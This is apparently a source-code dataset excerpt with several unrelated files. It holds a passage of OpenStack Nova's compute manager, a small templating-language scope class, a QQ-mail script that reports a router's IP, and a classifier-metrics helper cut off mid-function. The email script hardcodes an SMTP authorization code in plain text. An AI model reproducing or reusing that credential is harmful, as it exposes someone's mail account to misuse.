# properly in the report client and this is a tiny edge case
# anyway.
self._resource_tracker = None
return
except Exception:
LOG.exception("Error updating resources for node %(node)s.",
{'node': nodename})
@periodic_task.periodic_task(spacing=CONF.update_resources_interval)
def update_available_resource(self, context, startup=False):
"""See driver.get_available_resource()
Periodic process that keeps that the compute host's understanding of
resource availability and usage in sync with the underlying hypervisor.
:param context: security context
:param startup: True if this is being called when the nova-compute
service is starting, False otherwise.
"""
compute_nodes_in_db = self._get_compute_nodes_in_db(context,
use_slave=True,
startup=startup)
try:
nodenames = set(self.driver.get_available_nodes())
except exception.VirtDriverNotReady:
LOG.warning("Virt driver is not ready.")
return
for nodename in nodenames:
self.update_available_resource_for_node(context, nodename)
# Delete orphan compute node not reported by driver but still in db
for cn in compute_nodes_in_db:
if cn.hypervisor_hostname not in nodenames:
LOG.info("Deleting orphan compute node %(id)s "
"hypervisor host is %(hh)s, "
"nodes are %(nodes)s",
{'id': cn.id, 'hh': cn.hypervisor_hostname,
'nodes': nodenames})
cn.destroy()
# Delete the corresponding resource provider in placement,
# along with any associated allocations and inventory.
# TODO(cdent): Move use of reportclient into resource tracker.
self.scheduler_client.reportclient.delete_resource_provider(
context, cn, cascade=True)
def _get_compute_nodes_in_db(self, context, use_slave=False,
startup=False):
try:
return objects.ComputeNodeList.get_all_by_host(context, self.host,
use_slave=use_slave)
except exception.NotFound:
if startup:
LOG.warning(
"No compute node record found for host %s. If this is "
"the first time this service is starting on this "
"host, then you can ignore this warning.", self.host)
else:
LOG.error("No compute node record for host %s", self.host)
return []
@periodic_task.periodic_task(
spacing=CONF.running_deleted_instance_poll_interval)
def _cleanup_running_deleted_instances(self, context):
"""Cleanup any instances which are erroneously still running after
having been deleted.
Valid actions to take are:
1. noop - do nothing
2. log - log which instances are erroneously running
3. reap - shutdown and cleanup any erroneously running instances
4. shutdown - power off *and disable* any erroneously running
instances
The use-case for this cleanup task is: for various reasons, it may be
possible for the database to show an instance as deleted but for that
instance to still be running on a host machine (see bug
https://bugs.launchpad.net/nova/+bug/911366).
This cleanup task is a cross-hypervisor utility for finding these
zombied instances and either logging the discrepancy (likely what you
should do in production), or automatically reaping the instances (more
appropriate for dev environments).
"""
action = CONF.running_deleted_instance_action
if action == "noop":
return
# NOTE(sirp): admin contexts don't ordinarily return deleted records
with utils.temporary_mutation(context, read_deleted="yes"):
for instance in self._running_deleted_instances(context):
if action == "log":
LOG.warning("Detected instance with name label "
"'%s' which is marked as "
"DELETED but still present on host.",
instance.name, instance=instance)
elif action == 'shutdown':
LOG.info("Powering off instance with name label "
"'%s' which is marked as "
"DELETED but still present on host.",
instance.name, instance=instance)
try:
try:
# disable starting the instance
self.driver.set_bootable(instance, False)
except NotImplementedError:
LOG.debug("set_bootable is not implemented "
"for the current driver")
# and power it off
self.driver.power_off(instance)
except Exception:
LOG.warning("Failed to power off instance",
instance=instance, exc_info=True)
elif action == 'reap':
LOG.info("Destroying instance with name label "
"'%s' which is marked as "
"DELETED but still present on host.",
instance.name, instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid, use_slave=True)
self.instance_events.clear_events_for_instance(instance)
try:
self._shutdown_instance(context, instance, bdms,
notify=False)
self._cleanup_volumes(context, instance, bdms)
except Exception as e:
LOG.warning("Periodic cleanup failed to delete "
"instance: %s",
e, instance=instance)
else:
raise Exception(_("Unrecognized value '%s'"
" for CONF.running_deleted_"
"instance_action") % action)
def _running_deleted_instances(self, context):
"""Returns a list of instances nova thinks is deleted,
but the hypervisor thinks is still running.
"""
timeout = CONF.running_deleted_instance_timeout
filters = {'deleted': True,
'soft_deleted': False}
instances = self._get_instances_on_driver(context, filters)
return [i for i in instances if self._deleted_old_enough(i, timeout)]
def _deleted_old_enough(self, instance, timeout):
deleted_at = instance.deleted_at
if deleted_at:
deleted_at = deleted_at.replace(tzinfo=None)
return (not deleted_at or timeutils.is_older_than(deleted_at, timeout))
@contextlib.contextmanager
def _error_out_instance_on_exception(self, context, instance,
instance_state=vm_states.ACTIVE):
instance_uuid = instance.uuid
try:
yield
except NotImplementedError as error:
with excutils.save_and_reraise_exception():
LOG.info("Setting instance back to %(state)s after: "
"%(error)s",
{'state': instance_state, 'error': error},
instance_uuid=instance_uuid)
self._instance_update(context, instance,
vm_state=instance_state,
task_state=None)
except exception.InstanceFaultRollback as error:
LOG.info("Setting instance back to ACTIVE after: %s",
error, instance_uuid=instance_uuid)
self._instance_update(context, instance,
vm_state=vm_states.ACTIVE,
task_state=None)
raise error.inner_exception
except Exception:
LOG.exception('Setting instance vm_state to ERROR',
instance_uuid=instance_uuid)
with excutils.save_and_reraise_exception():
self._set_instance_obj_error_state(context, instance)
@wrap_exception()
def add_aggregate_host(self, context, aggregate, host, slave_info):
"""Notify hypervisor of change (for hypervisor pools)."""
try:
self.driver.add_to_aggregate(context, aggregate, host,
slave_info=slave_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'add_aggregate_host')
except exception.AggregateError:
with excutils.save_and_reraise_exception():
self.driver.undo_aggregate_operation(
context,
aggregate.delete_host,
aggregate, host)
@wrap_exception()
def remove_aggregate_host(self, context, host, slave_info, aggregate):
"""Removes a host from a physical hypervisor pool."""
try:
self.driver.remove_from_aggregate(context, aggregate, host,
slave_info=slave_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'remove_aggregate_host')
except (exception.AggregateError,
exception.InvalidAggregateAction) as e:
with excutils.save_and_reraise_exception():
self.driver.undo_aggregate_operation(
context,
aggregate.add_host,
aggregate, host,
isinstance(e, exception.AggregateError))
def _process_instance_event(self, instance, event):
_event = self.instance_events.pop_instance_event(instance, event)
if _event:
LOG.debug('Processing event %(event)s',
{'event': event.key}, instance=instance)
_event.send(event)
else:
# If it's a network-vif-unplugged event and the instance is being
# deleted then we don't need to make this a warning as it's
# expected. There are other things which could trigger this like
# detaching an interface, but we don't have a task state for that.
if (event.name == 'network-vif-unplugged' and
instance.task_state == task_states.DELETING):
LOG.debug('Received event %s for instance which is being '
'deleted.', event.key, instance=instance)
else:
LOG.warning('Received unexpected event %(event)s for '
'instance with vm_state %(vm_state)s and '
'task_state %(task_state)s.',
{'event': event.key,
'vm_state': instance.vm_state,
'task_state': instance.task_state},
instance=instance)
def _process_instance_vif_deleted_event(self, context, instance,
deleted_vif_id):
# If an attached port is deleted by neutron, it needs to
# be detached from the instance.
# And info cache needs to be updated.
network_info = instance.info_cache.network_info
for index, vif in enumerate(network_info):
if vif['id'] == deleted_vif_id:
LOG.info('Neutron deleted interface %(intf)s; '
'detaching it from the instance and '
'deleting it from the info cache',
{'intf': vif['id']},
instance=instance)
del network_info[index]
base_net_api.update_instance_cache_with_nw_info(
self.network_api, context,
instance,
nw_info=network_info)
try:
self.driver.detach_interface(context, instance, vif)
except NotImplementedError:
# Not all virt drivers support attach/detach of interfaces
# yet (like Ironic), so just ignore this.
pass
except exception.NovaException as ex:
LOG.warning("Detach interface failed, "
"port_id=%(port_id)s, reason: %(msg)s",
{'port_id': deleted_vif_id, 'msg': ex},
instance=instance)
break
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def extend_volume(self, context, instance, extended_volume_id):
# If an attached volume is extended by cinder, it needs to
# be extended by virt driver so host can detect its new size.
# And bdm needs to be updated.
LOG.debug('Handling volume-extended event for volume %(vol)s',
{'vol': extended_volume_id}, instance=instance)
try:
bdm = objects.BlockDeviceMapping.get_by_volume_and_instance(
context, extended_volume_id, instance.uuid)
except exception.NotFound:
LOG.warning('Extend volume failed, '
'volume %(vol)s is not attached to instance.',
{'vol': extended_volume_id},
instance=instance)
return
LOG.info('Cinder extended volume %(vol)s; '
'extending it to detect new size',
{'vol': extended_volume_id},
instance=instance)
volume = self.volume_api.get(context, bdm.volume_id)
if bdm.connection_info is None:
LOG.warning('Extend volume failed, '
'attached volume %(vol)s has no connection_info',
{'vol': extended_volume_id},
instance=instance)
return
connection_info = jsonutils.loads(bdm.connection_info)
bdm.volume_size = volume['size']
bdm.save()
if not self.driver.capabilities.get('supports_extend_volume', False):
raise exception.ExtendVolumeNotSupported()
try:
self.driver.extend_volume(connection_info,
instance)
except Exception as ex:
LOG.warning('Extend volume failed, '
'volume_id=%(volume_id)s, reason: %(msg)s',
{'volume_id': extended_volume_id, 'msg': ex},
instance=instance)
raise
@wrap_exception()
def external_instance_event(self, context, instances, events):
# NOTE(danms): Some event types are handled by the manager, such
# as when we're asked to update the instance's info_cache. If it's
# not one of those, look for some thread(s) waiting for the event and
# unblock them if so.
for event in events:
instance = [inst for inst in instances
if inst.uuid == event.instance_uuid][0]
LOG.debug('Received event %(event)s',
{'event': event.key},
instance=instance)
if event.name == 'network-changed':
try:
LOG.debug('Refreshing instance network info cache due to '
'event %s.', event.key, instance=instance)
self.network_api.get_instance_nw_info(
context, instance, refresh_vif_id=event.tag)
except exception.NotFound as e:
LOG.info('Failed to process external instance event '
'%(event)s due to: %(error)s',
{'event': event.key, 'error': six.text_type(e)},
instance=instance)
elif event.name == 'network-vif-deleted':
try:
self._process_instance_vif_deleted_event(context,
instance,
event.tag)
except exception.NotFound as e:
LOG.info('Failed to process external instance event '
'%(event)s due to: %(error)s',
{'event': event.key, 'error': six.text_type(e)},
instance=instance)
elif event.name == 'volume-extended':
self.extend_volume(context, instance, event.tag)
else:
self._process_instance_event(instance, event)
@periodic_task.periodic_task(spacing=CONF.image_cache_manager_interval,
external_process_ok=True)
def _run_image_cache_manager_pass(self, context):
"""Run a single pass of the image cache manager."""
if not self.driver.capabilities["has_imagecache"]:
return
# Determine what other nodes use this storage
storage_users.register_storage_use(CONF.instances_path, CONF.host)
nodes = storage_users.get_storage_users(CONF.instances_path)
# Filter all_instances to only include those nodes which share this
# storage path.
# TODO(mikal): this should be further refactored so that the cache
# cleanup code doesn't know what those instances are, just a remote
# count, and then this logic should be pushed up the stack.
filters = {'deleted': False,
'soft_deleted': True,
'host': nodes}
filtered_instances = objects.InstanceList.get_by_filters(context,
filters, expected_attrs=[], use_slave=True)
self.driver.manage_image_cache(context, filtered_instances)
@periodic_task.periodic_task(spacing=CONF.instance_delete_interval)
def _run_pending_deletes(self, context):
"""Retry any pending instance file deletes."""
LOG.debug('Cleaning up deleted instances')
filters = {'deleted': True,
'soft_deleted': False,
'host': CONF.host,
'cleaned': False}
attrs = ['system_metadata']
with utils.temporary_mutation(context, read_deleted='yes'):
instances = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=attrs, use_slave=True)
LOG.debug('There are %d instances to clean', len(instances))
# TODO(raj_singh): Remove this if condition when min value is
# introduced to "maximum_instance_delete_attempts" cfg option.
if CONF.maximum_instance_delete_attempts < 1:
LOG.warning('Future versions of Nova will restrict the '
'"maximum_instance_delete_attempts" config option '
'to values >=1. Update your configuration file to '
'mitigate future upgrade issues.')
for instance in instances:
attempts = int(instance.system_metadata.get('clean_attempts', '0'))
LOG.debug('Instance has had %(attempts)s of %(max)s '
'cleanup attempts',
{'attempts': attempts,
'max': CONF.maximum_instance_delete_attempts},
instance=instance)
if attempts < CONF.maximum_instance_delete_attempts:
success = self.driver.delete_instance_files(instance)
instance.system_metadata['clean_attempts'] = str(attempts + 1)
if success:
instance.cleaned = True
with utils.temporary_mutation(context, read_deleted='yes'):
instance.save()
@periodic_task.periodic_task(spacing=CONF.instance_delete_interval)
def _cleanup_incomplete_migrations(self, context):
"""Delete instance files on failed resize/revert-resize operation
During resize/revert-resize operation, if that instance gets deleted
in-between then instance files might remain either on source or
destination compute node because of race condition.
"""
LOG.debug('Cleaning up deleted instances with incomplete migration ')
migration_filters = {'host': CONF.host,
'status': 'error'}
migrations = objects.MigrationList.get_by_filters(context,
migration_filters)
if not migrations:
return
inst_uuid_from_migrations = set([migration.instance_uuid for migration
in migrations])
inst_filters = {'deleted': True, 'soft_deleted': False,
'uuid': inst_uuid_from_migrations}
attrs = ['info_cache', 'security_groups', 'system_metadata']
with utils.temporary_mutation(context, read_deleted='yes'):
instances = objects.InstanceList.get_by_filters(
context, inst_filters, expected_attrs=attrs, use_slave=True)
for instance in instances:
if instance.host != CONF.host:
for migration in migrations:
if instance.uuid == migration.instance_uuid:
# Delete instance files if not cleanup properly either
# from the source or destination compute nodes when
# the instance is deleted during resizing.
self.driver.delete_instance_files(instance)
try:
migration.status = 'failed'
with migration.obj_as_admin():
migration.save()
except exception.MigrationNotFound:
LOG.warning("Migration %s is not found.",
migration.id,
instance=instance)
break
@messaging.expected_exceptions(exception.InstanceQuiesceNotSupported,
exception.QemuGuestAgentNotEnabled,
exception.NovaException,
NotImplementedError)
@wrap_exception()
def quiesce_instance(self, context, instance):
"""Quiesce an instance on this host."""
context = context.elevated()
image_meta = objects.ImageMeta.from_instance(instance)
self.driver.quiesce(context, instance, image_meta)
def _wait_for_snapshots_completion(self, context, mapping):
for mapping_dict in mapping:
if mapping_dict.get('source_type') == 'snapshot':
def _wait_snapshot():
snapshot = self.volume_api.get_snapshot(
context, mapping_dict['snapshot_id'])
if snapshot.get('status') != 'creating':
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_snapshot)
timer.start(interval=0.5).wait()
@messaging.expected_exceptions(exception.InstanceQuiesceNotSupported,
exception.QemuGuestAgentNotEnabled,
exception.NovaException,
NotImplementedError)
@wrap_exception()
def unquiesce_instance(self, context, instance, mapping=None):
"""Unquiesce an instance on this host.
If snapshots' image mapping is provided, it waits until snapshots are
completed before unqueiscing.
"""
context = context.elevated()
if mapping:
try:
self._wait_for_snapshots_completion(context, mapping)
except Exception as error:
LOG.exception("Exception while waiting completion of "
"volume snapshots: %s",
error, instance=instance)
image_meta = objects.ImageMeta.from_instance(instance)
self.driver.unquiesce(context, instance, image_meta)
# NOTE(danms): This proxy object provides a 4.x interface for received RPC
# calls so we are compatible with 5.0 (above) and 4.22 from <=Queens. This
# should be removed in Rocky when we drop 4.x support.
class _ComputeV4Proxy(object):
target = messaging.Target(version='4.22')
def __init__(self, manager):
self.manager = manager
def __getattr__(self, name):
# NOTE(danms): Anything not called out below is straight-through
return getattr(self.manager, name)
def attach_interface(self, context, instance, network_id, port_id,
requested_ip, tag=None):
return self.manager.attach_interface(context, instance, network_id,
port_id, requested_ip, tag)
def check_can_live_migrate_source(self, ctxt, instance, dest_check_data):
# TODO(tdurakov): remove dict to object conversion once RPC API version
# is bumped to 5.x
got_migrate_data_object = isinstance(dest_check_data,
migrate_data_obj.LiveMigrateData)
if not got_migrate_data_object:
dest_check_data = \
migrate_data_obj.LiveMigrateData.detect_implementation(
dest_check_data)
result = self.manager.check_can_live_migrate_source(ctxt, instance,
dest_check_data)
if not got_migrate_data_object:
result = result.to_legacy_dict()
return result
def detach_volume(self, context, volume_id, instance, attachment_id=None):
return self.manager.detach_volume(context, volume_id, instance,
attachment_id)
def finish_resize(self, context, disk_info, image, instance, reservations,
migration):
return self.manager.finish_resize(context, disk_info, image, instance,
migration)
def finish_revert_resize(self, context, instance, reservations, migration):
return self.manager.finish_revert_resize(context, instance, migration)
def live_migration(self, context, dest, instance, block_migration,
migration, migrate_data):
got_migrate_data_object = isinstance(migrate_data,
migrate_data_obj.LiveMigrateData)
if not got_migrate_data_object:
migrate_data = \
migrate_data_obj.LiveMigrateData.detect_implementation(
migrate_data)
return self.manager.live_migration(context, dest, instance,
block_migration, migration,
migrate_data)
def live_migration_force_complete(self, context, instance,
migration_id=None):
self.manager.live_migration_force_complete(context, instance)
def pre_live_migration(self, context, instance, block_migration, disk,
migrate_data):
# TODO(tdurakov): remove dict to object conversion once RPC API version
# is bumped to 5.x
got_migrate_data_object = isinstance(migrate_data,
migrate_data_obj.LiveMigrateData)
if not got_migrate_data_object:
migrate_data = \
migrate_data_obj.LiveMigrateData.detect_implementation(
migrate_data)
migrate_data = self.manager.pre_live_migration(context, instance,
block_migration, disk,
migrate_data)
# TODO(tdurakov): remove dict to object conversion once RPC API version
# is bumped to 5.x
if not got_migrate_data_object and migrate_data:
migrate_data = migrate_data.to_legacy_dict(
pre_migration_result=True)
migrate_data = migrate_data['pre_live_migration_result']
return migrate_data
def prep_resize(self, context, image, instance, instance_type,
reservations, request_spec, filter_properties, node,
clean_shutdown, migration=None, host_list=None):
# NOTE(melwitt): Remove this in version 5.0 of the RPC API
# Code downstream may expect extra_specs to be populated since it
# is receiving an object, so lookup the flavor to ensure this.
if not isinstance(instance_type, objects.Flavor):
instance_type = objects.Flavor.get_by_id(context,
instance_type['id'])
return self.manager.prep_resize(context, image, instance,
instance_type,
request_spec, filter_properties,
node, clean_shutdown,
migration, host_list)
def rebuild_instance(self, context, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage=None,
preserve_ephemeral=False, migration=None,
scheduled_node=None, limits=None, request_spec=None):
# FIXME(danms): Can remove handling for on_shared_storage below this
# point or does the API need it for compatibility?
return self.manager.rebuild_instance(context, instance, orig_image_ref,
image_ref, injected_files,
new_pass, orig_sys_metadata,
bdms, recreate,
on_shared_storage,
preserve_ephemeral,
migration,
scheduled_node, limits,
request_spec)
def resize_instance(self, context, instance, image, reservations,
migration, instance_type, clean_shutdown):
# TODO(chaochin) Remove this until v5 RPC API
# Code downstream may expect extra_specs to be populated since it
# is receiving an object, so lookup the flavor to ensure this.
if (not instance_type or
not isinstance(instance_type, objects.Flavor)):
instance_type = objects.Flavor.get_by_id(
context, migration['new_instance_type_id'])
return self.manager.resize_instance(context, instance, image,
migration, instance_type,
clean_shutdown)
def rollback_live_migration_at_destination(self, context, instance,
destroy_disks, migrate_data):
# TODO(tdurakov): remove dict to object conversion once RPC API
# version is bumped to 5.x
if isinstance(migrate_data, dict):
migrate_data = \
migrate_data_obj.LiveMigrateData.detect_implementation(
migrate_data)
return self.manager.rollback_live_migration_at_destination(
context, instance, destroy_disks, migrate_data)
def swap_volume(self, context, old_volume_id, new_volume_id, instance,
new_attachment_id=None):
return self.manager.swap_volume(context, old_volume_id, new_volume_id,
instance, new_attachment_id)
def reserve_block_device_name(self, context, instance, device, volume_id,
disk_bus, device_type, tag=None,
multiattach=False):
return self.manager.reserve_block_device_name(context, instance,
device, volume_id,
disk_bus, device_type,
tag, multiattach)
def terminate_instance(self, context, instance, bdms, reservations):
return self.manager.terminate_instance(context, instance, bdms)
def soft_delete_instance(self, context, instance, reservations):
return self.manager.soft_delete_instance(context, instance)
@object_compat
def refresh_instance_security_rules(self, context, instance):
return self.manager.refresh_instance_security_rules(context, instance)
# NOTE(hanlind): This and the virt method it calls can be removed in
# version 5.0 of the RPC API
@wrap_exception()
def refresh_security_group_rules(self, context, security_group_id):
"""Tell the virtualization driver to refresh security group rules.
Passes straight through to the virtualization driver.
"""
return self.manager.driver.refresh_security_group_rules(
security_group_id)
@object_compat
def get_instance_diagnostics(self, context, instance):
return self.manager.get_instance_diagnostics(context, instance)
def confirm_resize(self, context, instance, reservations, migration):
return self.manager.confirm_resize(context, instance, migration)
def revert_resize(self, context, instance, migration, reservations):
return self.manager.revert_resize(context, instance, migration)
| 48.001342 | 79 | 0.59046 |
4a1e3b77278c5b95b991a9d6df99b3b643fd65e0 | 2,288 | py | Python | epyc/scope.py | auscompgeek/perfectgift | 1c49a628ad17da151dfa9bfac7b3be857c143920 | [
"MIT"
] | 2 | 2016-12-11T21:58:13.000Z | 2018-01-31T02:43:48.000Z | epyc/scope.py | auscompgeek/perfectgift | 1c49a628ad17da151dfa9bfac7b3be857c143920 | [
"MIT"
] | null | null | null | epyc/scope.py | auscompgeek/perfectgift | 1c49a628ad17da151dfa9bfac7b3be857c143920 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# epyc: python-like templating langauge (Embedded PYthon Code)
# Copyright (C) 2014 Cyphar
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# 1. The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Scope Class
# Used to allow for global and local variable separation.
class Scope(dict):
'''
A dict-like scoping object, resolving global and local variables.
It chiefly allows for global and local scope separation.
'''
def __init__(self, items=None, parent=None):
self.items = items or {}
self.parent = parent
def __repr__(self):
return "Scope(items={!r}, parent={!r})".format(self.items, self.parent)
def __str__(self):
return "Scope(items={!r}, parent={!r})".format(self.items, self.parent)
def __getitem__(self, key):
if key in self.items:
return self.items[key]
if self.parent:
return self.parent[key]
raise KeyError("no such variable in current scope")
def __setitem__(self, key, value):
if self.parent and key in self.parent:
self.parent[key] = value
else:
self.items[key] = value
def __contains__(self, key):
if key in self.items:
return True
if self.parent:
return key in self.parent
return False
def __len__(self):
size = len(self.items)
if self.parent:
size += len(self.parent)
return size
def __bool__(self):
return True
| 30.918919 | 82 | 0.736451 |
4a1e3bcc14bbbfc5433c1012703fd242abc72cfe | 1,487 | py | Python | jobs/send_email_job.py | heavenbeing/stockleeks | e4b33d22a288d068db00770562d3b752fe4a6a58 | [
"Apache-2.0"
] | 4 | 2020-09-25T16:16:32.000Z | 2021-07-07T09:39:16.000Z | jobs/send_email_job.py | heavenbeing/stockleeks | e4b33d22a288d068db00770562d3b752fe4a6a58 | [
"Apache-2.0"
] | null | null | null | jobs/send_email_job.py | heavenbeing/stockleeks | e4b33d22a288d068db00770562d3b752fe4a6a58 | [
"Apache-2.0"
] | null | null | null | # smtplib 用于邮件的发信动作
import smtplib
import requests
from email.mime.text import MIMEText
# email 用于构建邮件内容
from email.header import Header
# 用于构建邮件头
# 发信方的信息:发信邮箱,QQ 邮箱授权码
from_addr = '[email protected]'
password = 'vxmovadvviffbgbj'
# 收信方邮箱
# to_addr = '[email protected],[email protected],[email protected]'
to_addr = '[email protected]'
# 发信服务器
smtp_server = 'smtp.qq.com'
# 邮箱正文内容,第一个参数为内容,第二个参数为格式(plain 为纯文本),第三个参数为编码
response = requests.get('http://ip.cip.cc')
print('ip address:')
print(response.text)
# /stock/data?table_name=guess_indicators_lite_buy_daily
# /stock/data?table_name=guess_indicators_lite_sell_daily
email_content = "Ip address:" + "heavenbeing.tpddns.cn\n" \
+ "stock address:" + "http://heavenbeing.tpddns.cn:8888/\n" \
+ "买入猜想(超买):" + "http://heavenbeing.tpddns.cn:8888/stock/data?table_name=guess_indicators_lite_buy_daily\n" \
+ "卖出猜想(超卖):" + "http://heavenbeing.tpddns.cn:8888/stock/data?table_name=guess_indicators_lite_sell_daily\n" \
+ " \r\n" \
+ " \r\nsend by python"
msg = MIMEText(email_content, 'plain', 'utf-8')
# 邮件头信息
msg['From'] = Header(from_addr)
msg['To'] = Header(to_addr)
msg['Subject'] = Header('路由器动态ip')
# 开启发信服务,这里使用的是加密传输
server = smtplib.SMTP_SSL(smtp_server)
server.connect(smtp_server, 465)
# 登录发信邮箱
server.login(from_addr, password)
# 发送邮件
server.sendmail(from_addr, to_addr.split(','), msg.as_string())
# 关闭服务器
server.quit()
| 29.156863 | 126 | 0.706792 |
4a1e3c5abfe94061b52c4e967ca044e6c2332e11 | 2,753 | py | Python | ldap2html/ldap2html/convert.py | nonylene/ldap2html | 99a0d012e50d1aaa96ebd0ae49240befe6bff858 | [
"MIT"
] | 4 | 2019-11-02T10:53:56.000Z | 2021-12-10T14:40:20.000Z | ldap2html/ldap2html/convert.py | nonylene/ldap2html | 99a0d012e50d1aaa96ebd0ae49240befe6bff858 | [
"MIT"
] | 1 | 2021-09-03T15:36:53.000Z | 2021-09-03T15:36:53.000Z | ldap2html/ldap2html/convert.py | nonylene/ldap2html | 99a0d012e50d1aaa96ebd0ae49240befe6bff858 | [
"MIT"
] | null | null | null | import ldap3
from operator import itemgetter
import itertools
from ..ldap.model import LdapHtmlText, LdapHtmlElement, LdapHtmlParticle, LdapHtmlFile, LdapHtmlVoidElement, ELEMENT_ATTR_DICT
from ..ldap import model as ldap_model
from ..ldap.utils import search
from ..html.model import HtmlElement, HtmlText, HtmlFile, HtmlVoidElement, HtmlNormalElement
filter_normal_element = f'(objectClass={ldap_model.OBJECT_CLASS_HTML_NORMAL_ELEMENT})'
filter_void_element = f'(objectClass={ldap_model.OBJECT_CLASS_HTML_VOID_ELEMENT})'
filter_text = f'(objectClass={ldap_model.OBJECT_CLASS_HTML_TEXT})'
def to_html_text(l_text: LdapHtmlText) -> HtmlText:
return HtmlText(l_text.htmlTextValue[0].decode())
def _to_html_element(l_element: LdapHtmlElement) -> HtmlElement:
# attributes
attrs = {}
for l_html_attr, html_attr in ELEMENT_ATTR_DICT.items():
values = getattr(l_element, l_html_attr)
if len(values) > 0:
attrs[html_attr] = values[0].decode()
return HtmlElement(
l_element.dn, l_element.htmlTagName[0].decode(), attrs
)
def to_html_void_element(l_element: LdapHtmlVoidElement) -> HtmlVoidElement:
element = _to_html_element(l_element)
return HtmlVoidElement(
element._id, element.tag_name, element.attributes
)
def _get_nth(particle: LdapHtmlParticle) -> int:
if len(particle.htmlNthChild) == 0:
return -1
return particle.htmlNthChild[0]
def to_html_normal_element(conn: ldap3.Connection, l_element: LdapHtmlElement) -> HtmlNormalElement:
# child texts
texts = (
(_get_nth(text), to_html_text(text)) for text in search(conn, l_element.dn, filter_text, LdapHtmlText)
)
# child void elements
void_elements = (
(_get_nth(elem), to_html_void_element(elem)) for elem in search(conn, l_element.dn, filter_void_element, LdapHtmlVoidElement)
)
# child normal elements
normal_elements = (
(_get_nth(elem), to_html_normal_element(conn, elem)) for elem in search(conn, l_element.dn, filter_normal_element, LdapHtmlElement)
)
# sort praticles
sorted_elements = sorted(itertools.chain(texts, void_elements, normal_elements), key=itemgetter(0))
children = [index_elm[1] for index_elm in sorted_elements]
base_element = _to_html_element(l_element)
return HtmlNormalElement(
base_element._id, base_element.tag_name, base_element.attributes,
children
)
def to_html_file(conn: ldap3.Connection, l_html_file: LdapHtmlFile) -> HtmlFile:
top_l_html_element = next(search(conn, l_html_file.dn, filter_normal_element, LdapHtmlElement))
top_html_element = to_html_normal_element(conn, top_l_html_element)
return HtmlFile(l_html_file.o[0], top_html_element)
| 36.706667 | 139 | 0.748275 |
4a1e3c7eae557a2b14d00f775477270cfca2c27a | 522 | py | Python | shaneleblancnet/users/admin.py | shaneleblanc/portfolio-django | 9d3a0cebdc072f0536e1be39fa28fd71c1138fe1 | [
"BSD-3-Clause"
] | 1 | 2020-09-08T21:21:29.000Z | 2020-09-08T21:21:29.000Z | shaneleblancnet/users/admin.py | shaneleblanc/portfolio-django | 9d3a0cebdc072f0536e1be39fa28fd71c1138fe1 | [
"BSD-3-Clause"
] | 4 | 2021-03-18T21:08:11.000Z | 2021-09-08T00:16:23.000Z | shaneleblancnet/users/admin.py | shaneleblanc/portfolio-django | 9d3a0cebdc072f0536e1be39fa28fd71c1138fe1 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib import admin
from django.contrib.auth import admin as auth_admin
from django.contrib.auth import get_user_model
from shaneleblancnet.users.forms import UserChangeForm, UserCreationForm
User = get_user_model()
@admin.register(User)
class UserAdmin(auth_admin.UserAdmin):
form = UserChangeForm
add_form = UserCreationForm
fieldsets = (("User", {"fields": ("name",)}),) + auth_admin.UserAdmin.fieldsets
list_display = ["username", "name", "is_superuser"]
search_fields = ["name"]
| 29 | 83 | 0.750958 |
4a1e3db5df47115354cd0badb41806fa17246bbc | 2,161 | py | Python | Scripts/classifier_metrics.py | MathewTWilliams/News-Category-Classifiers | eddbc87919ff7de08ff5c42b05b5b35177ddb12e | [
"MIT"
] | null | null | null | Scripts/classifier_metrics.py | MathewTWilliams/News-Category-Classifiers | eddbc87919ff7de08ff5c42b05b5b35177ddb12e | [
"MIT"
] | null | null | null | Scripts/classifier_metrics.py | MathewTWilliams/News-Category-Classifiers | eddbc87919ff7de08ff5c42b05b5b35177ddb12e | [
"MIT"
] | null | null | null | #Author: Matt Williams
#Version: 12/08/2021
from sklearn.metrics import classification_report, hamming_loss, jaccard_score
from save_load_json import save_json
from utils import make_result_path
from numpy import NINF, PINF
from utils import get_result_path
from save_load_json import load_json
import os
def calculate_classifier_metrics(true_labels, predictions, model_details):
'''Given the true_labels, the predictions of the classifer, and the classifier details,
calculate a classification report and save them to a json file along with
the model details.'''
model_details['Classification_Report'] = classification_report(true_labels, predictions, output_dict=True,
digits=4)
model_details['Hamming_Lose'] = hamming_loss(true_labels, predictions)
model_details['Jaccard_Score'] = jaccard_score(true_labels, predictions, average="macro")
model_details['Predictions'] = predictions.tolist()
file_path = make_result_path(model_details['Model'], model_details['Vector_Model'])
save_json(model_details, file_path)
def find_best_result(classifier_name, vec_model_name, metric, large = True):
'''Given the classifier name, the vector model used, and the name of the classifier metric,
return the file name that contains the best metric value for the given parameters and that score'''
best_score = NINF if large else PINF
best_file_name = ""
if not os.path.exists(get_result_path(classifier_name,"")):
return
for file in os.listdir(get_result_path(classifier_name,"")):
if file.startswith(vec_model_name):
results = load_json(get_result_path(classifier_name, file))['Classification_Report']
if metric not in results.keys():
return ""
if large and results[metric] > best_score:
best_file_name = file
best_score = results[metric]
elif not large and results[metric] < best_score:
best_file_name = file
